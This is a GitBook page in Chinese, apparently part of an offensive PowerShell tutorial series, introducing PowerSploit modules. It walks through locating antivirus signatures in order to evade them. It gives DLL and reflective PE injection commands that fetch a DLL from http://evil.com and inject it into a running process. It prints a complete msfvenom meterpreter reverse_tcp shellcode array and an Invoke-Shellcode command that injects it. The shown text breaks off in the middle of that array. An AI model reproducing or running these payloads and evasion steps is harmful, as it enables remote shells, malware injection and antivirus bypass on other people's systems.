
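<!doctype html>
<!-- The body text of this page is Simplified Chinese (see the chapter list and article
     paragraphs); an empty lang="" leaves screen readers and font/hyphenation selection guessing. -->
<html lang="zh-Hans">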
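    <head>
        <!-- A document may carry only one character-encoding declaration; the legacy
             http-equiv="Content-Type" pragma that duplicated <meta charset> has been dropped. -->
        <meta charset="utf-8">
        <title>Framework · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <!-- Description taken from the article heading and opening paragraph. -->
        <meta name="description" content="Powershell(13)-Framework：PowerSploit 与 Nishang 框架介绍">
        <meta name="generator" content="GitBook 3.2.3">

        <link rel="stylesheet" href="gitbook/style.css">
        <link rel="stylesheet" href="gitbook/gitbook-plugin-highlight/website.css">
        <link rel="stylesheet" href="gitbook/gitbook-plugin-search/search.css">
        <link rel="stylesheet" href="gitbook/gitbook-plugin-fontsettings/website.css">

        <meta name="HandheldFriendly" content="true">
        <!-- user-scalable=no was removed: disabling pinch-zoom blocks readers who rely on
             magnification (WCAG 1.4.4). -->
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="black">
        <link rel="apple-touch-icon-precomposed" sizes="152x152" href="gitbook/images/apple-touch-icon-precomposed-152.png">
        <link rel="shortcut icon" href="gitbook/images/favicon.ico" type="image/x-icon">

        <!-- Previous chapter in reading order; the file name is the real target and is kept verbatim. -->
        <link rel="prev" href="12. 实例使用场景.html">
    </head>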
    <body>
        
<div class="book">
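    <div class="book-summary">
        <!-- The search plugin locates this control by id. The sidebar design has no room for
             a visible label, so the input is named with aria-label; placeholder alone is not
             announced reliably and disappears once text is typed. -->
        <div id="book-search-input" role="search">
            <input type="text" placeholder="Type to search" aria-label="Search this book">
        </div>
        <!-- Chapter list. The part headings (基础篇/进阶篇/应用篇) have no page of their own;
             the generator emitted each as an unclosed <span> terminated by a stray </a>, which
             made the nested <ul> a child of the span. They are properly closed spans here.
             The <nav> element already carries the navigation role, so no explicit role is set. -->
        <nav aria-label="Book contents">
            <ul class="summary">
                <li class="chapter" data-level="1.1" data-path="./">
                    <a href="./">前言</a>
                </li>
                <li class="chapter" data-level="1.2" data-path="kerberos/README.md">
                    <span>基础篇</span>
                    <ul class="articles">
                        <li class="chapter" data-level="1.2.1" data-path="2. 基础.html">
                            <a href="2. 基础.html">基础知识</a>
                        </li>
                        <li class="chapter" data-level="1.2.2" data-path="3. 脚本编写与执行.html">
                            <a href="3. 脚本编写与执行.html">脚本编写与执行</a>
                        </li>
                        <li class="chapter" data-level="1.2.3" data-path="4. Scoket网络编程.html">
                            <a href="4. Scoket网络编程.html">Scoket网络编程</a>
                        </li>
                        <li class="chapter" data-level="1.2.4" data-path="5. 端口扫描与服务爆破.html">
                            <a href="5. 端口扫描与服务爆破.html">端口扫描与服务爆破</a>
                        </li>
                        <li class="chapter" data-level="1.2.5" data-path="6. 多线程.html">
                            <a href="6. 多线程.html">多线程</a>
                        </li>
                    </ul>
                </li>
                <li class="chapter" data-level="1.3" data-path="ntlm-pian/README.md">
                    <span>进阶篇</span>
                    <ul class="articles">
                        <li class="chapter" data-level="1.3.1" data-path="7. WMI对象操作.html">
                            <!-- The bare "&" in the label is escaped; the rendered text is unchanged. -->
                            <a href="7. WMI对象操作.html">WMI&amp;dot-net对象操作</a>
                        </li>
                        <li class="chapter" data-level="1.3.2" data-path="8. Win32API.html">
                            <a href="8. Win32API.html">Win32API</a>
                        </li>
                        <!-- "&" inside the file name is escaped in both attributes; the resolved
                             path is byte-identical to the original. -->
                        <li class="chapter" data-level="1.3.3" data-path="9. Dll注入&amp;shellcode注入&amp;exe注入.html">
                            <a href="9. Dll注入&amp;shellcode注入&amp;exe注入.html">注入操作</a>
                        </li>
                        <li class="chapter" data-level="1.3.4" data-path="10. 混淆.html">
                            <a href="10. 混淆.html">混淆</a>
                        </li>
                        <li class="chapter" data-level="1.3.5" data-path="11. 日志操作.html">
                            <a href="11. 日志操作.html">日志操作</a>
                        </li>
                    </ul>
                </li>
                <li class="chapter" data-level="1.4" data-path="ldap-pian/README.md">
                    <span>应用篇</span>
                    <ul class="articles">
                        <li class="chapter" data-level="1.4.1" data-path="12. 实例使用场景.html">
                            <a href="12. 实例使用场景.html">实例使用场景</a>
                        </li>
                        <!-- The "active" class is the theme's highlight hook; aria-current exposes
                             the same state to assistive technology. -->
                        <li class="chapter active" data-level="1.4.2" data-path="13. Framework.html">
                            <a href="13. Framework.html" aria-current="page">Framework</a>
                        </li>
                    </ul>
                </li>
                <li class="divider"></li>
                <li>
                    <!-- target="blank" (no underscore) merely names a browsing context; the intended
                         new-tab behaviour needs "_blank". rel="noopener noreferrer" keeps the opened
                         external page from reaching window.opener and from receiving the referrer. -->
                    <a class="gitbook-link" href="https://www.gitbook.com" target="_blank" rel="noopener noreferrer">Published with GitBook</a>
                </li>
            </ul>
        </nav>
    </div>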

    <div class="book-body">
        
            <div class="body-inner">
                
                    

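<div class="book-header" role="navigation" aria-label="Page toolbar">
    <!-- Title. A label distinguishes this landmark from the chapter list in the sidebar,
         which is also a navigation landmark. -->
    <h1>
        <!-- The spinner icon is decorative only, so it is hidden from assistive technology. -->
        <i class="fa fa-circle-o-notch fa-spin" aria-hidden="true"></i>
        <a href=".">Framework</a>
    </h1>
    <!-- NOTE(review): the article body renders its own <h1>, so the page ends up with two;
         if the theme CSS allows, this title bar could be demoted to a non-heading element. -->
</div>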




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h1 id="powershell13-framework">Powershell(13)-Framework</h1>
<p>本篇对框架的介绍主要围绕<a href="https://github.com/PowerShellMafia/PowerSploit" target="_blank" rel="noopener noreferrer">Powersploit</a>与<a href="https://github.com/samratashok/nishang" target="_blank" rel="noopener noreferrer">Nishang</a>展开。本来也写了<a href="https://www.powershellempire.com/" target="_blank" rel="noopener noreferrer">Empire</a>的部分，但在本文发布前不久刚有类似的文章发表，所以删去了这部分内容；需要学习Empire的朋友，可以去安全客搜索相关文章，当然还是推荐查看Empire的手册。下面开始介绍这两个框架：</p>
<p>注：本篇篇幅可能较长，文字较多，需要时可直接在文章内搜索定位。</p>
<h2 id="powersploit">PowerSploit</h2>
<h3 id="antivirusbypass">AntivirusBypass</h3>
<h4 id="find-avsignature">Find-AVSignature</h4>
<p>&#x5BFB;&#x627E;&#x53CD;&#x75C5;&#x6BD2;&#x8F6F;&#x4EF6;&#x7279;&#x5F81;&#x7801;&#xFF0C;&#x601D;&#x8DEF;&#x7C7B;&#x4F3C;&#x4E8E;&#x4E8C;&#x5206;&#x6CD5;</p>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p> <a href="http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html" target="_blank">http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html</a></p>
</blockquote>
<p><strong>&#x793A;&#x4F8B;</strong>
&#x5047;&#x8BBE;&#x6211;&#x4EEC;&#x7684;&#x8FDC;&#x63A7;&#x6587;&#x4EF6;&#x504F;&#x79FB;&#x8303;&#x56F4;&#x4E3A;0~10000</p>
<pre><code class="lang-powershell">Find-AVSignature -StartByte <span class="hljs-number">0</span> -EndByte <span class="hljs-number">10000</span> -Interval <span class="hljs-number">5000</span> -Path test.exe
</code></pre>
<p>&#x8FD9;&#x6761;&#x547D;&#x4EE4;&#x5C06;&#x4F1A;&#x628A;test.exe&#x4EE5;5000&#x5B57;&#x8282;&#x4F5C;&#x4E3A;&#x5757;&#x5927;&#x5C0F;&#xFF0C;&#x5206;&#x4E3A;&#x4E24;&#x4E2A;&#x6709;&#x6548;&#x90E8;&#x5206;&#x3002;&#x7B2C;&#x4E00;&#x4E2A;&#x90E8;&#x5206;&#x504F;&#x79FB;&#x8303;&#x56F4;&#x662F;0~5000&#xFF0C;&#x7B2C;&#x4E8C;&#x90E8;&#x5206;&#x504F;&#x79FB;&#x4E3A;0~9999&#x3002;&#x4E4B;&#x540E;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5206;&#x522B;&#x4F7F;&#x7528;&#x6740;&#x8F6F;&#x626B;&#x63CF;&#x8FD9;&#x4E24;&#x4E2A;&#x6587;&#x4EF6;&#x3002;&#x4E0D;&#x59A8;&#x8BBE;&#x7B2C;&#x4E00;&#x4E2A;&#x6587;&#x4EF6;&#x6CA1;&#x6709;&#x62A5;&#x6BD2;&#xFF0C;&#x800C;&#x7B2C;&#x4E8C;&#x4E2A;&#x6587;&#x4EF6;&#x62A5;&#x6BD2;&#x4E86;&#xFF0C;&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5C31;&#x77E5;&#x9053;&#xFF0C;&#x7279;&#x5F81;&#x7801;&#x5E94;&#x8BE5;&#x5B58;&#x5728;&#x4E8E;&#x504F;&#x79FB;&#x8303;&#x56F4;5001~9999&#x5B57;&#x8282;&#x5185;&#x3002;</p>
<p>&#x63A5;&#x4E0B;&#x6765;&#x6211;&#x4EEC;&#x91CD;&#x590D;&#x540C;&#x6837;&#x7684;&#x6B65;&#x9AA4;&#xFF1A;</p>
<pre><code>Find-AVSignature -StartByte 5001 -EndByte 10000 -Interval 2500 -Path test.exe
</code></pre><p>&#x518D;&#x5C06;&#x5F97;&#x5230;&#x7684;&#x6587;&#x4EF6;&#x8FDB;&#x884C;&#x626B;&#x63CF;&#xFF0C;&#x5982;&#x6B64;&#x5F80;&#x590D;&#xFF0C;&#x76F4;&#x5230;&#x5B9A;&#x4F4D;&#x51FA;&#x7279;&#x5F81;&#x7801;&#x3002;</p>
<h3 id="codeexecution">CodeExecution</h3>
<h4 id="invoke-dllinjection">Invoke-DLLInjection</h4>
<p>DLL&#x6CE8;&#x5165;&#x811A;&#x672C;
&#x6CE8;&#x610F;dll&#x67B6;&#x6784;&#x8981;&#x4E0E;&#x76EE;&#x6807;&#x8FDB;&#x7A0B;&#x76F8;&#x7B26;&#xFF0C;&#x540C;&#x65F6;&#x8981;&#x5177;&#x5907;&#x76F8;&#x5E94;&#x7684;&#x6743;&#x9650;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Invoke-DLLInjection -ProcessID <span class="hljs-number">1612</span> -dll test.dll
</code></pre>
<h4 id="invoke-reflectivepeinjection">Invoke-ReflectivePEInjection</h4>
<p>&#x53CD;&#x5C04;&#x578B;&#x6CE8;&#x5165;&#xFF0C;bypass AV&#x7684;&#x4E00;&#x628A;&#x5229;&#x5668;
&#x4E2A;&#x4EBA;&#x8BA4;&#x4E3A;&#x53CD;&#x5C04;&#x578B;dll&#x6CE8;&#x5165;&#x7684;&#x7CBE;&#x9AD3;&#x4E4B;&#x4E00;&#x5C31;&#x5728;&#x4E8E;&#x80FD;&#x505A;&#x5230;&#x4E0D;&#x5728;&#x76EE;&#x6807;&#x78C1;&#x76D8;&#x4E0A;&#x7559;&#x4E0B;&#x6587;&#x4EF6;&#xFF0C;&#x800C;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x7684;&#x4E00;&#x5927;&#x7F3A;&#x9677;&#x4FBF;&#x662F;&#x4E0D;&#x80FD;&#x8FDC;&#x7A0B;&#x52A0;&#x8F7D;dll/exe&#xFF0C;&#x56E0;&#x6B64;&#x8981;&#x505A;&#x5230;&#x65E0;&#x6587;&#x4EF6;&#x5C31;&#x7A0D;&#x663E;&#x9EBB;&#x70E6;&#x3002; &#x597D;&#x5728;&#x5DF2;&#x7ECF;&#x6709;&#x4EBA;&#x5199;&#x51FA;&#x4E86;&#x53EF;&#x4EE5;&#x4ECE;&#x670D;&#x52A1;&#x5668;&#x4E0B;&#x8F7D;&#x6587;&#x4EF6;&#x5E76;&#x6CE8;&#x5165;&#x7684;<a href="https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1" target="_blank">&#x811A;&#x672C;</a>&#x3002;</p>
<p>需要注意的是，ForceASLR选项并不适用于所有dll/exe，架构上也应尽量保持一致。</p>
<p><strong>&#x4E0B;&#x9762;&#x5747;&#x4EE5;&#x52A0;&#x5F3A;&#x7248;&#x4F5C;&#x793A;&#x4F8B;</strong>&#x3002;</p>
<p><strong>&#x793A;&#x4F8B;</strong>
<strong>&#x4E0B;&#x8F7D;dll&#x5E76;&#x6CE8;&#x5165;&#x5230;id&#x4E3A;1320&#x7684;&#x8FDB;&#x7A0B;&#x4E2D;</strong></p>
<pre><code class="lang-powershell">Invoke-ReflectivePEInjection -PEUrl http://evil.com/test.dll -ProcId <span class="hljs-number">1320</span>
</code></pre>
<p><strong>&#x5F3A;&#x5236;&#x4F7F;&#x7528;ASLR</strong></p>
<pre><code class="lang-powershell">Invoke-ReflectivePEInjection -PEUrl http://evil.com/test.dll -ProcId <span class="hljs-number">1320</span> -ForceASLR
</code></pre>
<p><strong>&#x4ECE;&#x672C;&#x5730;&#x52A0;&#x8F7D;dll&#x5E76;&#x6CE8;&#x5165;&#x6307;&#x5B9A;&#x8FDB;&#x7A0B;</strong></p>
<pre><code class="lang-powershell">Invoke-ReflectivePEInjection -PEPath test.dll
-ProcId <span class="hljs-number">1320</span>
</code></pre>
<p><strong>&#x5411;exe&#x4F20;&#x53C2;</strong></p>
<pre><code class="lang-powershell">Invoke-ReflectivePEInjection -PEPath test.dll
-ProcId <span class="hljs-number">1320</span> -ExeArgs <span class="hljs-string">&quot;arg1 arg2&quot;</span>
</code></pre>
<h4 id="invoke-shellcode">Invoke-Shellcode</h4>
<p>&#x5411;&#x76EE;&#x6807;&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;shellcode
&#x4F9D;&#x7136;&#x9700;&#x8981;&#x6CE8;&#x610F;shellcode&#x67B6;&#x6784;&#x7684;&#x95EE;&#x9898;</p>
<p><strong>&#x793A;&#x4F8B;</strong>
<strong>&#x5411;powershell&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;meterpreter</strong></p>
<p><strong>&#x751F;&#x6210;shellcode</strong></p>
<pre><code class="lang-powershell">msfvenom -p windows/meterpreter/reverse_tcp lhost=<span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span> lport=<span class="hljs-number">4444</span> -f powershell

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: <span class="hljs-number">333</span> bytes
Final size of powershell file: <span class="hljs-number">1625</span> bytes
[Byte[]] <span class="hljs-variable">$buf</span> = <span class="hljs-number">0</span>xfc,<span class="hljs-number">0</span>xe8,<span class="hljs-number">0</span>x82,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x60,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>xe5,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>x64,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x30,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x14,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x72,<span class="hljs-number">0</span>x28,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>xb7,<span class="hljs-number">0</span>x4a,<span class="hljs-number">0</span>x26,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xac,<span class="hljs-number">0</span>x3c,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x7c,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>x2c,<span class="hljs-number">0</span>x20,<span class="hljs-number">0</span>xc1,<span class="hljs-number">0</span>xcf,<span class="hljs-number">0</span>xd,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>xe2,<span class="hljs-number">0</span>xf2,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4a,<span 
class="hljs-number">0</span>x3c,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4c,<span class="hljs-number">0</span>x11,<span class="hljs-number">0</span>x78,<span class="hljs-number">0</span>xe3,<span class="hljs-number">0</span>x48,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd1,<span class="hljs-number">0</span>x51,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x59,<span class="hljs-number">0</span>x20,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x49,<span class="hljs-number">0</span>x18,<span class="hljs-number">0</span>xe3,<span class="hljs-number">0</span>x3a,<span class="hljs-number">0</span>x49,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x34,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd6,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xac,<span class="hljs-number">0</span>xc1,<span class="hljs-number">0</span>xcf,<span class="hljs-number">0</span>xd,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>x38,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xf6,<span class="hljs-number">0</span>x3,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x3b,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xe4,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span 
class="hljs-number">0</span>x66,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x4b,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x1c,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd0,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>x44,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x5b,<span class="hljs-number">0</span>x5b,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x59,<span class="hljs-number">0</span>x5a,<span class="hljs-number">0</span>x51,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x5a,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x12,<span class="hljs-number">0</span>xeb,<span class="hljs-number">0</span>x8d,<span class="hljs-number">0</span>x5d,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x33,<span class="hljs-number">0</span>x32,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x77,<span class="hljs-number">0</span>x73,<span class="hljs-number">0</span>x32,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x54,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x4c,<span class="hljs-number">0</span>x77,<span class="hljs-number">0</span>x26,<span class="hljs-number">0</span>x7,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span 
class="hljs-number">0</span>xb8,<span class="hljs-number">0</span>x90,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>xc4,<span class="hljs-number">0</span>x54,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>x80,<span class="hljs-number">0</span>x6b,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x5,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>xa8,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x11,<span class="hljs-number">0</span>x5c,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>xe6,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xea,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>xdf,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x97,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x99,<span 
class="hljs-number">0</span>xa5,<span class="hljs-number">0</span>x74,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x85,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>x74,<span class="hljs-number">0</span>xa,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>x4e,<span class="hljs-number">0</span>x8,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xec,<span class="hljs-number">0</span>xe8,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x4,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>xd9,<span class="hljs-number">0</span>xc8,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x83,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x7e,<span class="hljs-number">0</span>x36,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x36,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>xa4,<span 
class="hljs-number">0</span>x53,<span class="hljs-number">0</span>xe5,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x93,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>xd9,<span class="hljs-number">0</span>xc8,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x83,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>x22,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xb,<span class="hljs-number">0</span>x2f,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>x30,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>x6e,<span class="hljs-number">0</span>x4d,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x5e,<span class="hljs-number">0</span>x5e,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x24,<span 
class="hljs-number">0</span>xe9,<span class="hljs-number">0</span>x71,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc3,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>xc6,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>xc3,<span class="hljs-number">0</span>xbb,<span class="hljs-number">0</span>xf0,<span class="hljs-number">0</span>xb5,<span class="hljs-number">0</span>xa2,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5
</code></pre>
<p><strong>&#x6CE8;&#x5165;shellcode</strong></p>
<pre><code class="lang-powershell">Invoke-Shellcode -Shellcode @(<span class="hljs-number">0</span>xfc,<span class="hljs-number">0</span>xe8,<span class="hljs-number">0</span>x82,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x60,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>xe5,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>x64,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x30,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x14,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x72,<span class="hljs-number">0</span>x28,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>xb7,<span class="hljs-number">0</span>x4a,<span class="hljs-number">0</span>x26,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xac,<span class="hljs-number">0</span>x3c,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x7c,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>x2c,<span class="hljs-number">0</span>x20,<span class="hljs-number">0</span>xc1,<span class="hljs-number">0</span>xcf,<span class="hljs-number">0</span>xd,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>xe2,<span class="hljs-number">0</span>xf2,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x8b,<span 
class="hljs-number">0</span>x4a,<span class="hljs-number">0</span>x3c,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4c,<span class="hljs-number">0</span>x11,<span class="hljs-number">0</span>x78,<span class="hljs-number">0</span>xe3,<span class="hljs-number">0</span>x48,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd1,<span class="hljs-number">0</span>x51,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x59,<span class="hljs-number">0</span>x20,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x49,<span class="hljs-number">0</span>x18,<span class="hljs-number">0</span>xe3,<span class="hljs-number">0</span>x3a,<span class="hljs-number">0</span>x49,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x34,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd6,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xac,<span class="hljs-number">0</span>xc1,<span class="hljs-number">0</span>xcf,<span class="hljs-number">0</span>xd,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>x38,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xf6,<span class="hljs-number">0</span>x3,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x3b,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xe4,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x1,<span 
